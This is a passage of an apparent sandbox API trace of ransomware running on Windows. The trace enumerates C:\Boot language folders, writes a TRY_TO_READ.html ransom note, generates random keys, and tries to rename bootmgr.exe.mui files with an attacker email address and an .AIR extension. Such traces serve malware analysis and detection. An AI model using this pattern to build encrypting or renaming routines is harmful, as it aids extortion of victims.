hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e008 | out: hHeap=0x2e0000) returned 1 [0116.578] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.578] FindNextFileW (in: hFindFile=0x317d48, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.578] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.578] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.578] GetLastError () returned 0x0 [0116.578] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e008 [0116.578] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.578] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.578] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.578] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.578] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e008 | out: hHeap=0x2e0000) returned 1 [0116.578] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.578] FindNextFileW (in: hFindFile=0x317d48, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f6f5b0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f6f5b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f6f5b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.578] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.578] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.578] GetLastError () returned 0x0 [0116.578] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.578] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.578] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.578] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.578] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.578] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.578] FindNextFileW (in: hFindFile=0x317d48, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f6f5b0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f6f5b0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f6f5b0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.578] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.578] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x3580e0 [0116.578] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a68 [0116.578] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x3580e0 | out: pbBuffer=0x3580e0) returned 1 [0116.578] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330a68 | out: pbBuffer=0x330a68) returned 1 [0116.578] SetFileAttributesW (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.579] lstrlenW (lpString="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 30 [0116.579] GetProcessHeap () returned 0x2e0000 [0116.579] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.579] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui") returned="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui" [0116.579] lstrcatW (in: lpString1="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.579] MoveFileExW (lpExistingFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.579] CreateFileW (lpFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.579] GetProcessHeap () returned 0x2e0000 [0116.579] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.579] CloseHandle (hObject=0xffffffff) returned 0 [0116.579] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.579] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.579] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.579] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.579] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e0a8 | out: hHeap=0x2e0000) returned 1 [0116.579] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e0d0 | out: hHeap=0x2e0000) returned 1 [0116.579] FindFirstFileW (in: lpFileName="C:\\\\Boot\\da-DK\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x317d88 [0116.579] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.579] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.579] GetLastError () returned 0x6 [0116.579] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.580] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.580] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.580] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e0a8 [0116.580] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317dc8 [0116.580] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317dc8 | out: hHeap=0x2e0000) returned 1 [0116.580] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.580] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.580] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e0a8 | out: hHeap=0x2e0000) returned 1 [0116.580] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.580] FindNextFileW (in: hFindFile=0x317d88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.580] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.580] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.580] GetLastError () returned 0x6 [0116.580] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.580] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.580] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.580] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e0a8 [0116.580] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317dc8 [0116.580] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317dc8 | out: hHeap=0x2e0000) returned 1 [0116.580] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.580] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.580] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e0a8 | out: hHeap=0x2e0000) returned 1 [0116.580] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.580] FindNextFileW (in: hFindFile=0x317d88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.580] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.580] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.580] GetLastError () returned 0x6 [0116.580] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e0a8 [0116.580] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.580] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.580] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.580] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.580] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e0a8 | out: hHeap=0x2e0000) returned 1 [0116.581] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.581] FindNextFileW (in: hFindFile=0x317d88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f95710, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.581] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.581] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.581] GetLastError () returned 0x6 [0116.581] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.581] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.581] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.581] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.581] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.581] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.581] FindNextFileW (in: hFindFile=0x317d88, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f95710, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.581] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.581] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x3591f0 [0116.581] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a78 [0116.581] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x3591f0 | out: pbBuffer=0x3591f0) returned 1 [0116.581] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330a78 | out: pbBuffer=0x330a78) returned 1 [0116.581] SetFileAttributesW (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.581] lstrlenW (lpString="C:\\\\Boot\\da-DK\\bootmgr.exe.mui") returned 30 [0116.581] GetProcessHeap () returned 0x2e0000 [0116.581] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.581] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\da-DK\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\da-DK\\bootmgr.exe.mui") returned="C:\\\\Boot\\da-DK\\bootmgr.exe.mui" [0116.581] lstrcatW (in: lpString1="C:\\\\Boot\\da-DK\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\da-DK\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\da-DK\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.581] MoveFileExW (lpExistingFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.581] CreateFileW (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.581] GetProcessHeap () returned 0x2e0000 [0116.581] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.582] CloseHandle (hObject=0xffffffff) returned 0 [0116.582] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.582] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.582] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.582] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.582] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e0f8 | out: hHeap=0x2e0000) returned 1 [0116.582] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e120 | out: hHeap=0x2e0000) returned 1 [0116.582] FindFirstFileW (in: lpFileName="C:\\\\Boot\\de-DE\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x317dc8 [0116.582] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.582] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.582] GetLastError () returned 0x6 [0116.582] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.582] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.582] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.582] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e0f8 [0116.582] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317e08 [0116.582] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317e08 | out: hHeap=0x2e0000) returned 1 [0116.582] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.582] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.582] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e0f8 | out: hHeap=0x2e0000) returned 1 [0116.582] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.582] FindNextFileW (in: hFindFile=0x317dc8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.582] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.582] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.582] GetLastError () returned 0x6 [0116.582] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.583] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.583] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.583] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e0f8 [0116.583] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317e08 [0116.583] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317e08 | out: hHeap=0x2e0000) returned 1 [0116.583] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.583] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.583] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e0f8 | out: hHeap=0x2e0000) returned 1 [0116.583] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.583] FindNextFileW (in: hFindFile=0x317dc8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.583] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.583] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.583] GetLastError () returned 0x6 [0116.583] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e0f8 [0116.583] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.583] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.583] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.583] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.583] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e0f8 | out: hHeap=0x2e0000) returned 1 [0116.583] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.583] FindNextFileW (in: hFindFile=0x317dc8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f95710, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.583] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.583] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.583] GetLastError () returned 0x6 [0116.583] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.583] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.583] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.583] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.583] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.583] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.583] FindNextFileW (in: hFindFile=0x317dc8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f95710, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f95710, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f95710, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.583] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.583] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x35a300 [0116.583] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a88 [0116.583] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x35a300 | out: pbBuffer=0x35a300) returned 1 [0116.583] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330a88 | out: pbBuffer=0x330a88) returned 1 [0116.584] SetFileAttributesW (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.584] lstrlenW (lpString="C:\\\\Boot\\de-DE\\bootmgr.exe.mui") returned 30 [0116.584] GetProcessHeap () returned 0x2e0000 [0116.584] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.584] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\de-DE\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\de-DE\\bootmgr.exe.mui") returned="C:\\\\Boot\\de-DE\\bootmgr.exe.mui" [0116.584] lstrcatW (in: lpString1="C:\\\\Boot\\de-DE\\bootmgr.exe.mui", 